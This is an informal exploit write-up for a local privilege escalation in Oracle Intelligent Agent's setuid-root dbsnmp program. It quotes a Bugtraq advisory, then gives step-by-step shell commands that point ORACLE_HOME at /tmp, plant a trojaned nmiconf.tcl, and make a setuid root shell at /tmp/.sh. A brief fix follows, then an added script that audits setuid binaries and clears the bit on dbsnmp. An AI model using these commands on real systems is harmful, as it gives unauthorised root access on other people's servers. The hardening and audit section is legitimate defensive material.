`START OF BUGTRAQ POST
Oracle installations with the 'Oracle Intelligent Agent' installed have a
path related vulnerability. The problem lies in the dbsnmp program located
in $ORACLE_HOME/bin . This setuid root program calls a tcl script
(nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The
problem is that the dbsnmp script relies on an environment variable (the
path to nmiconf.tcl) which can be set by a user. Therefore, intruders
can force the script to execute a trojaned version of nmiconf.tcl which
will run as root.
END OF BUGTRAQ POST
apparently, as we see from above, $ORACLE_HOME would need to be reset for
this exploit to work properly. so let's do it.
first of all, drop to a bourne or korn shell and do the following:
-------
echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345
mkdir -p /tmp/whatever/network/agent/config
export $ORACLE_HOME=/tmp/whatever
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ system "/tmp/.12345" ]
EOF
# or even an exec call instead of system... whatever...
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/.12345 ]
EOF
-------
mileage may vary widely with your OS and tcl version,
so this is merely a template of the process involved...
however all one needs to do to make this a reality
is run the OLD dbsnmp program and you will spawn a
root shell in /tmp called /tmp/.sh
execute the root shell and enjoy elevated privileges.
NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable.
there's no reason to have it set in the first place as root should
be the only user really to allow an SNMP paradigm to run anyways.
duh
" ...it takes a good man to beat me... it just doesn't take very long."
.|.. ..|.
mujahadin
no extra charge for typos
`
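The fix the post recommends (turning off the suid bit on dbsnmp), written as an audit-and-harden check. This is an added example, not part of the original post or of Oracle's tooling; the function names are hypothetical, and the directory is passed explicitly as an argument (normally the real `$ORACLE_HOME/bin`) instead of being read from the environment.

```shell
#!/bin/sh
# Added example: audit for setuid binaries and strip the bit from dbsnmp.
# The bin directory is an explicit argument (assumption: it is the real
# Oracle bin directory), so the check does not depend on the caller's
# ORACLE_HOME value.

# Print every setuid regular file directly under the given directory.
list_setuid() {
    find "$1" -maxdepth 1 -type f -perm -4000 -print 2>/dev/null
}

# Return 0 if the file has the setuid bit set, 1 otherwise.
is_setuid() {
    [ -u "$1" ]
}

# Clear the setuid bit on <dir>/dbsnmp and confirm that it is gone.
# Returns 0 when dbsnmp ends up without setuid,
#         1 when the bit could not be removed,
#         2 when dbsnmp is not present in the directory.
harden_dbsnmp() {
    target="$1/dbsnmp"
    [ -f "$target" ] || return 2
    if is_setuid "$target"; then
        chmod u-s "$target" || return 1
    fi
    # Verify the result instead of trusting chmod's exit status alone.
    if is_setuid "$target"; then
        return 1
    fi
    return 0
}
```

Run `list_setuid` first to see what else in the directory carries the bit, then `harden_dbsnmp` as the file's owner or root; re-run the audit after patches or reinstalls, since an installer can set the bit again.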